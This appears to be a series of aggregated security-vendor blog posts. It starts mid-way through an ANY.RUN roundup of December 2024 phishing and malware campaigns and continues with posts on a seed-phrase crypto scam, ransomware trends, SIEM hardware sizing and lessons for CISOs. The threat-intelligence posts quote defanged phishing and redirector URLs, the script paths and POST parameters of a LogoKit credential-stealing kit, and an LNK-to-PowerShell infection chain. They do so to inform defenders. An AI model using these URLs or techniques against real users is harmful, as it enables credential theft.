The website’s design, background, and icons are stored on IPFS, while lure images, mimicking real services, are hosted on imgur .com.

View the attack unfold in the wild: one, other, or yet another sandbox session.

Analyze malicious files and links with ANY.RUN’s Interactive Sandbox for free 



Get 14-day trial


Phishing links in Microsoft Dynamics 365 web forms

Original post on X

And again, a Microsoft service utilized for malicious activity. Phishers create forms with embedded links on *.microsoft.com subdomains. The links that users receive look legitimate, so people feel safe opening them.

With TI Lookup, we uncovered a link that tricked users into attempting to access a non-existent PDF file hosted on a Microsoft website.

Phishing URL: hxxps://customervoice.microsoft[.]com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUNVIzNlI5MEhCNlBPRFMwMklUV0JZVTkxVS4u

Malicious page looks like a document hosted within Microsoft service

Use this simple query for TI Lookup to find attacks employing this technique and view them unveiled in our sandbox.

URLs engaged in the attack, found by TI Lookup

Anatomy of a fresh LogoKit

Original post on X

LogoKit is a comprehensive set of phishing tools known for using services that offer logos and screenshots of target websites. Our team has researched the algorithm of such an attack.

Icons, pictures, backgrounds, forms: LogoKit-powered fake page

Let’s look at the example run in our sandbox.

  • The company’s logo is fetched from a legitimate logo storage service: hxxps://logo.clearbit[.]com/<Domain>.
  • The background is retrieved via request to a website screenshot service, using the following template: hxxps://thum[.]io/get/width/<DPI>/https://<Domain>.
  • The domain chain is led by a decoder-redirector: hxxps:// asiangrocers [.]store/fri/?haooauvpco=bWlubmllQGRpc25leS5jb20. It is a fake Asian food store website built on a #WordPress template, with a domain age of around four years. The template contains email addresses filled with typos.

The decoder-redirector shields the page from analysis and redirects the victim to the actual phishing page.

In our example, the real content of the phishing page and the associated scripts are hosted on the Cloudflare Pages platform. They are stored in the assets/ folder, which contains styles, images, and scripts

Three scripts with random 10-character names are designed to protect the page from analysis and send stolen data to the threat actors:

  • assets/js/e0nt7h8uiw[.]js
  • assets/js/vddq2ozyod[.]js
  • assets/js/j3046eqymn[.]js

The stolen authentication data is sent to a remote Command and Control server controlled by the attackers via an HTTP POST request containing the following parameters: fox=&con=

Manufacturers, beware: an attack combining Lumma and Amadey is targeting you

The cybercriminals’ tactics of attacking the manufacturing industry are recently evolving from data encryption to snatching control over critical infrastructure and stealing sensitive information.

The consequences of such attacks can be severe, leading to theft of intellectual property, disruption of operations, financial losses, and compliance violations. Businesses need to take the threat most seriously, understand it and get prepared.

Attack used Emmenhtal loader to facilitate infection

This December, we have analyzed a new attack aimed at industrial market players. The mechanics are based on Lumma Stealer and Amadey Bot. The former hunts for valuable information, the latter takes control over the infected systems. View analysis.

  • It all starts with phishing emails with URLs leading users to download LNK files disguised as PDFs;
  • The malicious LNK file, once activated, initiates PowerShell via an ssh.exe command. Following a chain of scripts, a CPL file is downloaded;
  • PowerShell and Windows Management Instrumentation (WMI) commands are utilized to collect detailed information about the victim’s system.

For the details, read our blog post, view analysis session in our sandbox and dive deeper with TI Lookup. Use the search query with the name of the threat and the path to one of the malicious files used in the attack.

About ANY.RUN  

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

  • Detect malware in seconds
  • Interact with samples in real time
  • Save time and money on sandbox setup and maintenance
  • Record and study all aspects of malware behavior
  • Collaborate with your team 
  • Scale as you need

Get 14-day free trial of ANY.RUN’s Interactive Sandbox →

The post 5 Major Cyber Attacks in December 2024 appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Crypto scam: seed phrases shared publicly | Kaspersky official blog

“I have a question. I have USDT stored in my wallet, and I have the seed phrase. How to transfer my funds to another wallet?” — we found a comment like this under a finance-related video on YouTube. And the seed phrase was revealed in full in the comment.

This looked suspicious: even a complete cryptocurrency beginner should know better than to share their seed phrase with the entire world. We were wary, and for a good reason — this comment turned out to be a scam.

Keep reading to find out what can go wrong if you somehow come across someone’s seed phrase…

“I give you the seed phrase, and you help me transfer my money to another wallet”

Let’s start with the basics. A seed phrase is a randomly generated unique sequence of dictionary words that together form a phrase needed to recover access to a cryptowallet. When someone shares their seed phrase — essentially the key to their wallet — it looks extremely suspicious. We then discovered similar comments, each containing the same recovery phrase and a request for help transferring funds to another platform. Notably, all these messages were posted from newly created accounts.

In similar comments written from newly created accounts, supposedly “crypto newbies” generously share their seed phrases

Now, let’s imagine for a second that someone reading one of these comments is a little unscrupulous and, instead of helping the newbie, decides to take a peek inside the wallet (after all, they have the key). Upon opening the wallet, they’re pleasantly surprised to find it stuffed with USDT: a TRC20 token on the TRON network tied to the value of the US dollar. The wallet contains the equivalent of eight thousand dollars. Well, what to do next? The correct answer would be to remember that there’s no such thing as a free lunch, and steer well clear of the wallet.

Finding several thousand US dollars in someone else's wallet looks like a lucky chance to get rich for a immoral person

Finding several thousand US dollars in someone else’s wallet looks like a lucky chance to get rich for a immoral person

However, the scam assumes that our nefarious passerby will want to appropriate all or at least part of the cryptocurrency. But to withdraw USDT, a small fee must be paid in another currency: TRX (the TRON cryptocurrency token). Unfortunately, the wallet doesn’t have enough TRX, so the thief tries to transfer TRX from their own personal wallet — only to discover that the tokens they transferred immediately ended up in a completely different, third wallet.

The list of transactions details the scammers' earnings

The list of transactions details the scammers’ earnings

The catch is that the bait is set up as a multi-signature wallet. To authorize outgoing transactions in such wallets, approval from two or more people is required, so transferring USDT to a personal wallet won’t work — even after paying the “commission”.

So, the scammers are impersonating beginners who foolishly share access to their cryptowallets, tricking equally naive thieves — who end up becoming the victims. In this scenario, the scammers are something like digital Robin Hoods, as the scheme primarily targets other crooked individuals. But this twist is nothing new — we’ve previously covered a much more elegant crypto fraud scheme, also aimed at unprincipled people.

How to protect yourself from crypto scams

The way to protect against the above-described scam is quite simple: just be a decent person and don’t try to get into other people’s cryptowallets — even if the seed phrase is left in the comments of your favorite YouTube channel or even slipped under your front door.

In all other cases, crypto asset owners can follow these universal tips and recommendations:

  • Learn about the latest scams aimed at stealing cryptocurrency to stay aware of current trends.
  • Secure your devices with reliable protection.
  • Double-check any information received from strangers: scammers can pose both as beginners in the crypto world or as experienced trading sharks.

Kaspersky official blog – ​Read More

Top 10 Ransomware Trends Observed in 2024: A Look Ahead to 2025

Cyble-Blogs-Ransomware

Ransomware attacks have evolved into one of the most significant threats to global cybersecurity. These attacks have shifted from mere opportunistic schemes to advanced operations targeting businesses, critical infrastructure, and even governments. The year 2024 saw ransomware actors innovating at an unprecedented pace, leveraging new technologies and tactics to inflict maximum damage.

With ransomware incidents causing an average cost of $4.54 million per breach—excluding ransom payments—it is imperative for organizations to stay informed and prepared.

This article delves into the top 10 ransomware trends observed in 2024 and provides predictions for what lies ahead in 2025.

1. Double and Triple Extortion Schemes

In 2024, ransomware actors moved beyond simple file encryption to adopt double and triple extortion tactics. These methods involve not only encrypting a victim’s data but also exfiltrating it and threatening to release it publicly unless a ransom is paid. Triple extortion adds another dimension: threatening to disrupt business operations or targeting customers and third parties associated with the victim.

  • Example: A leading healthcare provider in the U.S. fell victim to a triple extortion scheme where attackers encrypted sensitive patient records, exfiltrated the data, and launched Distributed Denial of Service (DDoS) attacks until the ransom was paid. This resulted in financial losses and severe reputational damage.

Prediction for 2025: Expect these multi-layered extortion methods to become the norm as attackers seek greater leverage and higher payouts. Organizations will need to strengthen their data security measures and incident response plans to mitigate these risks.

2. Ransomware-as-a-Service (RaaS) Proliferation

The Ransomware-as-a-Service (RaaS) model gained significant traction in 2024, enabling even low-skilled cybercriminals to launch ransomware attacks. Under this model, ransomware developers provide affiliates with ready-to-use tools and infrastructure in exchange for a share of the profits.

  • Example: Groups like LockBit, BlackCat, and Play have turned RaaS into a booming industry, offering technical support, user manuals, and even marketing strategies to affiliates.

Prediction for 2025: The RaaS ecosystem will expand further, with more criminal groups entering the market. This will likely result in a surge in ransomware incidents targeting small and medium-sized businesses (SMBs) that lack advanced cybersecurity defenses.

3. Data Exfiltration as a Standard Tactic

Stealing sensitive data before encrypting systems has become a standard tactic in ransomware operations. This not only increases the ransom demand but also amplifies the reputational and regulatory consequences for victims.

  • Example: In 2024, a global financial institution faced a ransomware attack where attackers exfiltrated millions of customer records. The breach led to legal consequences and a loss of customer trust, despite the organization’s efforts to recover.

Prediction for 2025: With stricter data privacy regulations like GDPR and CCPA, data exfiltration attacks will pose an even greater risk. Organizations will need to implement stronger encryption and data loss prevention (DLP) solutions to counteract these threats.

4. Zero-Day Exploits and Advanced Phishing

Ransomware groups are increasingly using zero-day vulnerabilities and highly targeted phishing campaigns to gain initial access to victim networks.

  • Example: In 2024, a large technology company was breached when employees fell for an advanced phishing email disguised as a legitimate communication from a trusted vendor. The attackers exploited a zero-day vulnerability to deploy ransomware, causing significant operational downtime.

Prediction for 2025: As more organizations adopt digital transformation initiatives, the attack surface for ransomware groups will expand. Expect more zero-day exploits and socially engineered phishing campaigns aimed at high-value targets.

5. Living Off the Land (LotL) Techniques

Ransomware actors are employing Living Off the Land (LotL) techniques to evade detection by using legitimate tools and processes already present in the victim’s network.

  • Example: In a 2024 attack on a healthcare organization, attackers used PowerShell and Remote Desktop Protocol (RDP) to move laterally within the network without triggering traditional security alarms.

Prediction for 2025: LotL techniques will become more prevalent, making it essential for organizations to implement advanced endpoint detection and response (EDR) solutions and conduct regular audits of privileged accounts.

6. Critical Infrastructure as a Prime Target

Critical infrastructure sectors, including healthcare, energy, and government, have become top targets for ransomware groups. These sectors often lack strong cybersecurity defenses, making them vulnerable to attacks with far-reaching consequences.

  • Example: In 2024, a North American energy provider suffered a ransomware attack that caused widespread power outages and operational disruptions.

Prediction for 2025: With geopolitical tensions on the rise, ransomware attacks on critical infrastructure are expected to increase. Governments and private sectors will need to collaborate on improving the resilience of these essential systems.

7. Industrial Ransomware Targeting Manufacturing

The manufacturing and industrial sectors have seen a rise in ransomware attacks, disrupting production lines and supply chains.

  • Example: In 2024, a global automotive manufacturer was hit by ransomware that halted production for weeks, leading to millions in losses and delayed product deliveries.

Prediction for 2025: As industrial control systems (ICS) and IoT devices become more interconnected, ransomware targeting these environments will grow. Organizations must prioritize securing operational technology (OT) networks.

8. Decline in Average Ransom Payment but Higher Incident Costs

While the average ransom payment dropped from $850,000 to $569,000 in 2024, the overall cost of ransomware incidents has risen due to operational disruptions, data recovery expenses, and reputational damage.

  • Example: A mid-sized retail company paid a lower ransom in 2024 but incurred over $3 million in total costs due to lost sales, customer churn, and recovery efforts.

Prediction for 2025: Organizations may see lower ransom demands, but the indirect costs of ransomware attacks will continue to climb. This highlights the importance of proactive defenses and comprehensive incident response plans.

9. Evolving Ransomware Variants

New ransomware variants with enhanced capabilities emerged in 2024, including Akira and BlackCat, which feature advanced encryption and stealth techniques.

  • Example: Akira ransomware targeted a European bank, using multi-layered encryption that rendered recovery nearly impossible without paying the ransom.

Prediction for 2025: Ransomware variants will continue to evolve, focusing on bypassing traditional defenses and targeting cloud environments and hybrid work setups.

10. Increased International Collaboration and Crackdowns

Law enforcement agencies and cybersecurity organizations have intensified their efforts to combat ransomware through international collaboration. In 2024, several high-profile ransomware groups were dismantled, and stolen funds were recovered.

  • Example: A joint operation by the FBI and Europol in 2024 disrupted a major ransomware operation, recovering $20 million in ransom payments.

Prediction for 2025: While these crackdowns are promising, ransomware groups will adapt and find new ways to evade law enforcement. Continued international collaboration will be critical to countering these threats.

Looking Ahead to 2025

As we move into 2025, the ransomware landscape will continue to evolve. Here are some key predictions:

  1. AI-Powered Ransomware: Attackers will leverage artificial intelligence to automate ransomware campaigns and improve phishing success rates.
  2. Focus on Cloud Environments: With more businesses migrating to the cloud, ransomware groups will target cloud-native applications and services.
  3. Stricter Regulations: Governments will implement more stringent reporting and compliance requirements for ransomware incidents.
  4. Cyber Insurance Challenges: The cost of cyber insurance will rise, with stricter conditions for coverage related to ransomware.
  5. Post-Attack Recovery Services: Organizations will invest more in post-attack recovery services, such as takedown solutions and data restoration.

To Sum Up

The ransomware trends of 2024 highlight threat actors‘ adaptability and ingenuity. To stay ahead of these evolving threats, organizations must adopt a proactive approach, including strong cybersecurity measures, employee awareness programs, and collaborative efforts with industry peers and law enforcement.

By understanding the tactics and strategies employed by ransomware groups, businesses can better prepare for the challenges that lie ahead in 2025 and beyond.

Source:

https://cyble.com/knowledge-hub/ransomware-tactics-adopted-by-threat-actors-in-2024/

https://www.statista.com/topics/4136/ransomware/#topicOverview

Monthly Ransomware Threat Intelligence 2027.pdf

The post Top 10 Ransomware Trends Observed in 2024: A Look Ahead to 2025 appeared first on Cyble.

Blog – Cyble – ​Read More

Hardware for SIEM systems | Kaspersky official blog

At some point, the information security department of any large company inevitably begins to consider introducing a SIEM system — or replacing the existing one, and must therefore estimate the budget required for its deployment. But SIEM isn’t a lightweight product that can be deployed within existing infrastructure. Almost all solutions in this category require additional hardware, meaning that equipment must be purchased or rented.

So, for accurate budgeting, it’s necessary to take into account the expected hardware configuration. In this post, we discuss how SIEM hardware requirements change depending on the company’s profile and system’s architecture, and provide rough parameters to help estimate the preliminary cost of such equipment.

Evaluating the data flow

Essentially, a SIEM system collects event data from internal and external sources and identifies security threats by correlating this data. Therefore, before considering what hardware will be required, it’s essential to first assess the volume of information the system will process and store. To this end, you need to first identify critical risks to the infrastructure, and then determine the data sources that must be analyzed to help detect and address threats related to these risks. These are the data sources to focus on. Such an assessment is necessary not only to determine the required hardware, but also to estimate the cost of licensing. For example, the cost of licensing for our Kaspersky Unified Monitoring and Analysis Platform SIEM system directly depends on the number of events per second (EPS). Another important aspect is to check how the vendor calculates the number of events for licensing. In our case, we take the events per second after filtering and aggregation, calculating the average number of events over the past 24 hours rather than their peak values — but not all vendors follow this approach.

The most common sources include endpoints (Windows events, Sysmon, PowerShell logs, and antivirus logs), network devices (firewalls, IDS/IPS, switches, access points), proxy servers (such as Squid and Cisco WSA), vulnerability scanners, databases, cloud systems (such as AWS CloudTrail or Office 365), and infrastructure management servers (domain controllers, DNS servers, and so on).

As a rule, to form preliminary expectations about the average event flow, the size of the organization can serve as a guide. However, the architectural particularities of specific IT infrastructure can make company size a less decisive parameter.

In general, for small and medium-sized organizations with just one office — or up to several offices with good communication channels among them and IT infrastructure located in a single data center — an average event flow of 5000–10 000 EPS can be expected. For large companies, making an estimate is more challenging: depending on the complexity of the infrastructure and the presence of branches, EPS can range from 50 000 to 200 000 EPS.

Architectural components of an SIEM system

An SIEM system generally consists of four main components: the management subsystem, event collection subsystem, correlation subsystem, and storage subsystem.

Core (management subsystem). You can think of this as the control center of the system. It allows managing the other components, and provides visualization tools for SOC analysts — enabling them to easily configure operational parameters, monitor the SIEM system’s state, and, most importantly, view, analyze, sort and search events, process alerts, and work with incidents. This control center needs to also support log viewing through widgets and dashboards, and enable quick data search and access.

The core is an essential component and can be installed as a single instance or as a cluster to provide a higher level of resilience.

Event collection subsystem. As the name suggests, this subsystem collects data from various sources and converts it into a unified format through parsing and normalization. To calculate the required capacity of this subsystem, one must consider both the event flow intensity and the log format in which events arrive from sources.

The server load depends on how the subsystem processes logs. For example, even for structured logs (Key Value, CSV, JSON, XML), you can use either regular expressions (requiring significantly more powerful hardware) or the vendor’s built-in parsers.

Correlation subsystem. This subsystem analyzes data collected from logs, identifies sequences described in correlation rule logic, and, if necessary, generates alerts, determines their threat levels, and minimizes false positives. It’s important to remember that the correlator’s load is also determined not only by the event flow but by the number of correlation rules and the methods used to describe detection logic as well.

Storage subsystem. An SIEM system must not only analyze but also store data for internal investigations, analytics, visualization and reporting, and in certain industries — for regulatory compliance and retrospective alert analysis. Thus, another critical question at the SIEM system design stage is how long you want to store collected logs. From an analyst’s perspective, the longer the data is stored, the better. However, a longer log retention period increases hardware requirements. A mature SIEM system provides the ability to strike a balance by setting different retention periods for different log types. For example, 30 days for NetFlow logs, 60 days for Windows informational events, 180 days for Windows authentication events, and so on. This allows data to be optimally allocated across available server resources.

It’s also important to understand what volume of data will be stored using hot storage (allowing quick access) and cold storage (suitable for long-term retention). The storage subsystem must offer high performance, scalability, cross-storage search capabilities (both hot and cold), and data viewing options. Additionally, the ability to back up stored data is essential.

Architectural features of Kaspersky SIEM

So, we’ve laid out the ideal requirements for an SIEM system. It probably won’t surprise you that our Kaspersky Unified Monitoring and Analysis Platform meets these requirements. With its built-in capability to scale for data flows reaching hundreds of thousands of EPS within a single instance, our SIEM system isn’t afraid of high loads. Importantly, it doesn’t need to be split into multiple instances with correlation results reconciled afterwards — unlike many alternative systems.

The event collection subsystem of the Kaspersky Unified Monitoring and Analysis Platform system is equipped with a rich set of parsers optimized for processing logs in each format. Additionally, the multi-threading capabilities of Go mean the event flow can be processed using all available server resources.

The data storage subsystem used in our SIEM system consists of servers that store data, and servers with the clickhouse-keeper role, which manage the cluster (these servers don’t store data themselves but facilitate coordination among instances). For data flows of 20 000 EPS with a relatively low number of search queries, these services can operate on the same servers that store the data. For higher data flows, it’s recommended to separate these services. For instance, they can be deployed on virtual machines (a minimum of one is required, though three are recommended).

The Kaspersky Unified Monitoring and Analysis SIEM storage system is flexible — allowing event flows to be distributed across multiple spaces, and specifying the storage depth for each space. For example, inexpensive disks can be used to create cold storage (where searches are still possible, just slower). This cold storage can house data that is unlikely to require analysis but must be stored due to regulatory requirements. Such information can be moved to cold storage literally the day after it’s collected.

Thus, the data storage approach implemented in our SIEM system enables long-term data retention without exceeding the budget on expensive equipment, thanks to hot and cold storage capabilities.

SIEM architecture deployment using our SIEM as an example

The Kaspersky Unified Monitoring and Analysis Platform supports multiple deployment options, so it’s important first to determine your organization’s architecture needs. This can be done based on the estimated EPS flow, and the particularities of your company. For simplicity, let’s assume the required data retention period is 30 days.

Data flow: 5000–10 000 EPS

For a small organization, the SIEM system can be deployed on a single server. For example, our SIEM system supports the All-in-One installation option. In this case, the required server configuration is 16 CPUs, 32GB of RAM, and a 2.5TB of disk space.

Data flow: 30 000 EPS

For larger organizations, separate servers are needed for each SIEM component. Dedicating a server exclusively for storage ensures that search queries don’t affect the processing of events by the collector and correlator. However, the collector and correlator services can still be deployed together (or separately, if desired). An approximate equipment configuration for this scenario is as follows:

  • Core: 10 CPUs, 24GB of RAM, 0.5TB of disk space
  • Collector: 8 CPUs, 16GB of RAM, 0.5TB of disk space
  • Correlator: 8 CPUs, 32GB of RAM, 0.5TB of disk space
  • Storage: 24 CPUs, 64GB of RAM, 14TB of disk space

Data flow: 50 000–200 000 EPS

For large enterprises, additional factors must be considered when defining the architecture. These include ensuring resilience (as the substantial data-flow increases the risk of failure) and the presence of company divisions (branches). In such cases, more servers may be required to install the SIEM system, as it’s preferable to distribute collector and correlator services across different servers for such high EPS flows.

Data flow: 200 000 EPS

As EPS flows grow and the infrastructure divides into separate independent units, the amount of equipment required increases accordingly. Additional servers will be needed for collectors, storage, correlators, and keepers. Moreover, in large organizations, data availability requirements may take precedence. In this case, the Kaspersky Unified Monitoring and Analysis Platform storage cluster divides all collected events into shards. Each shard consists of one or more data replicas. And each shard replica is a cluster node, meaning a separate server. To ensure resilience and performance, we recommend deploying the cluster with two replicas per shard. For processing such large EPS volumes, three collector servers may be required, installed in the offices with the highest event flows.

Kaspersky SIEM in holding companies

In large enterprises, the cost of implementing an SIEM system increases not only with the volume of data, but also depending on the usage profile. For example, in some cases (such as MSP and MSSP environments, as well as large holding companies with multiple subsidiaries or branches), multi-tenancy is required. This means the company needs to maintain multiple “mini-SIEMs”, which operate independently. Our solution enables this through a single installation at the head office, without the need to install separate systems in/at each branch/tenant. This significantly reduces equipment costs.

SIEM scheme

Let’s imagine either (i) a holding company, (ii) a vertically-integrated enterprise, or (iii) a geographically-distributed corporation with either various independent security teams or a need to isolate data access among branches. The Kaspersky Unified Monitoring and Analysis Platform tenant model allows for segregated access to all resources, events, and third-party integration settings. This means one installation functions as multiple separate SIEM systems. In this case, while each tenant can develop its own content (correlation rules), there’s also the option of distributing a unified set of resources across all divisions. In other words, each division can have its own collectors, correlators, and rules, but the HQ security team can also assign standardized bundles of security content for everyone — ensuring consistent protection across the organization.

SIEM in holding

Thus, using the Kaspersky Unified Monitoring and Analysis Platform ensures the necessary performance with relatively modest computing resources. In some cases, savings on hardware can reach up to 50%.

For a more accurate understanding of the required resources and implementation costs, we recommend talking with our specialists or integration partners. We (or our partners) can also provide premium support, assist in developing additional integrations (including using API capabilities for connected products), and oversee the deployment of a turnkey solution covering system design, equipment estimation, configuration optimization, and much more. Learn more about our SIEM system, the Kaspersky Unified Monitoring and Analysis Platform, on the official product page.

Kaspersky official blog – ​Read More

Top 5 Lessons for CISOs and Cybersecurity Professionals from 2024

Cyble | lessons for CISO

The year 2024 has been a rollercoaster for cybersecurity professionals worldwide. From ransomware attacks paralyzing critical industries to insider threats causing massive data breaches, the challenges for Chief Information Security Officers (CISOs) and cybersecurity teams have been relentless. These cyberattacks and data breaches highlight the importance of adapting strategies and learning from past events to secure organizations better as cyber threats evolve. 

Here are the top five lessons for CISO and cybersecurity professionals should learn from as 2025 begins. 

Lessons from 2024 that CISOs Must Carry Forward 

1. Human Error Remains the Biggest Cyber Vulnerability 

A staggering 84% of CISOs in countries like Saudi Arabia, Canada, France, and South Korea identified human error as their organization’s greatest cybersecurity weakness in 2024. This vulnerability extends to phishing attacks, misconfigurations, poor credential management, and insider threats. 

Case in Point: The Star Health Insurance Breach 

In August 2024, India’s largest health insurer, Star Health, suffered a data breach exposing millions of customer medical reports and personal details. The threat actor “xenZen” accused the company’s CISO of insider collusion, sharing a screenshot alleging that credentials were leaked via email. 

This Star Health Insurance data breach highlights two key lessons: 

  • Cybersecurity training needs to go beyond awareness: Employees, especially those handling sensitive data, must undergo regular, scenario-based training. 

  • Strengthen insider threat detection: Advanced monitoring tools and strict access controls can help detect suspicious activities before they escalate into full-blown breaches. 

2. Multi-Factor Authentication (MFA) Is Non-Negotiable 

In 2024, weak or absent MFA emerged as a common denominator in several high-profile breaches. Attackers exploited credential weaknesses to gain access to sensitive systems, causing significant damage. 

Case in Point: The Snowflake Breach 

The U.S.-based cloud storage company Snowflake experienced a breachwhere compromised credentials—obtained through malware—were used to access sensitive customer data. The lack of MFA enforcement on demo accounts allowed hackers to compromise the data of high-profile clients like TicketMaster and LendingTree. 

Lesson Learned: 

  • Implement MFA universally: Every account, internal or external, must have MFA enabled. A single weak link can jeopardize the entire ecosystem. 

  • Enforce credential hygiene: Regularly rotate credentials, monitor for leaked credentials on the dark web, and implement strong password policies. 

3. Ransomware Is Evolving—So Must Your Defenses 

Ransomware attacks continued to dominate headlines in 2024, with 41% of CISOs worldwide naming it a top cybersecurity risk. These attacks increasingly targeted critical infrastructure and essential service providers, making their impact devastating. 

Case in Point: The CDK Global Ransomware Attack 

In June 2024, CDK Global, a software provider for car dealerships, was hit by a ransomware attack that disrupted operations for over 15,000 dealerships. Major companies like Asbury Automotive and Lithia Motors had to revert to manual processes, resulting in financial losses and customer dissatisfaction. 

Lesson Learned: 

  • Strengthen endpoint protection: Implement advanced threat detection tools to identify and stop ransomware before it spreads. 

  • Create vigorous incident response plans: Include regular backups, tabletop exercises, and quick recovery protocols to minimize downtime. 

4. The Supply Chain Is a Critical Weak Link

Cybercriminals increasingly exploited vulnerabilities in supply chains, targeting third-party vendors to gain access to larger organizations. 

Case in Point: The Dell Data Breach 

In 2024, Dell confirmed a data breach exposing 49 million customer purchase records. While financial data remained secure, the stolen information was sufficient to launch phishing and smishing attacks. 

Case in Point: The Ascension Health Cyberattack 

A massive cyberattack on Ascension Health disrupted clinical operations, forcing the nonprofit health system to disconnect from some business partners. The attack led to an additional operating loss of $1.8 billion for the fiscal year. 

Lesson Learned: 

  • Conduct thorough vendor risk assessments: Before partnering with third-party vendors, evaluate their cybersecurity posture. 

  • Mandate compliance with security standards: Require vendors to adopt strong security practices like SOC 2 compliance and regular penetration testing. 

5. Customer Trust Is Harder to Rebuild After a Breach

In 2024, cyberattacks had far-reaching consequences beyond financial losses. According to statistics, 47% of respondents indicated that attracting new customers became significantly harder after a data breach. 

Case in Point: Change Healthcare (CHC) Ransomware Attack 

In February 2024, Change Healthcare fell victim to a ransomware attack linked to the BlackCat group. With sensitive health data of over 110 million individuals exposed, the incident eroded trust among customers. Despite offering credit monitoring services, the reputational damage proved difficult to mitigate. 

Lesson Learned: 

  • Be transparent and proactive: When breaches occur, communicate quickly, outline steps taken to mitigate the impact, and offer affected customers tangible support. 

  • Invest in brand reputation management: Build a strong security narrative and a culture of trust through certifications, audits, and visible cybersecurity initiatives. 

Actionable Takeaways for CISOs and Cybersecurity Professionals 

As the threat landscape becomes increasingly complex, organizations must adopt a multi-faceted approach to cybersecurity. Incorporating advanced tools and platforms can significantly enhance CISO’s ability to address modern threats and safeguard their enterprise. 

Tools like Cyble Vision provide a comprehensive suite of capabilities that can empower organizations to identify, monitor, and mitigate threats across their digital footprint. For example: 

  • Attack Surface Management: Proactively identify and mitigate vulnerabilities by gaining a complete view of your organization’s external attack surface. 

  • Brand Intelligence: Protect against online brand abuse, including phishing and fraudulent domains, to safeguard customer trust and your organization’s reputation. 

  • Dark Web Monitoring: Stay ahead of cybercriminals with continuous monitoring of dark web activities, uncovering leaked credentials, sensitive data, and emerging threats. 

  • Cyber Threat Intelligence: Leverage AI-driven insights and continuous monitoring to detect and counteract evolving cyber threats in real time. 

  • Takedown and Disruption Services: Address malicious campaigns effectively by removing fraudulent websites and disrupting attack operations. 

  • Third-Party Risk Management: Identify and mitigate risks from vendors and external collaborators, ensuring security in your business partnerships. 

  • Vulnerability Management: Use advanced scanning and remediation tools to address vulnerabilities before they are exploited. 

These capabilities, combined with features like digital forensics, incident response, and executive monitoring, enable CISOs to adopt a proactive, intelligence-led approach to managing cybersecurity challenges. Solutions like Cyble’s provide the visibility and tools needed to stay ahead of adversaries, reduce exposure, and protect critical assets. 

By integrating such advanced tools into their cybersecurity frameworks, CISOs can not only address existing risks but also build resilience against future threats, ensuring their organization’s digital security is always one step ahead. 

To Sum Up 

The lessons from 2024’s high-profile cyberattacks highlight the need for a shift from reactive to proactive cybersecurity strategies. With 38% of CISOs identifying malware as a top risk and 29% pointing to email fraud and DDoS attacks, it’s clear that the threat landscape continues to evolve at an alarming pace.  

However, as businesses navigate these challenges, the focus must remain on fortifying human and technological defenses, building cyber resilience, and fostering transparency in post-breach communication. 

As organizations worldwide grapple with the dual pressures of digital transformation and escalating cyber threats, the stakes have never been higher. Learning from the mistakes and successes of 2024 will empower CISOs and cybersecurity professionals to build stronger, more adaptive defenses—ensuring not just survival but success in the face of cyber adversity. 

The post Top 5 Lessons for CISOs and Cybersecurity Professionals from 2024 appeared first on Cyble.

Blog – Cyble – ​Read More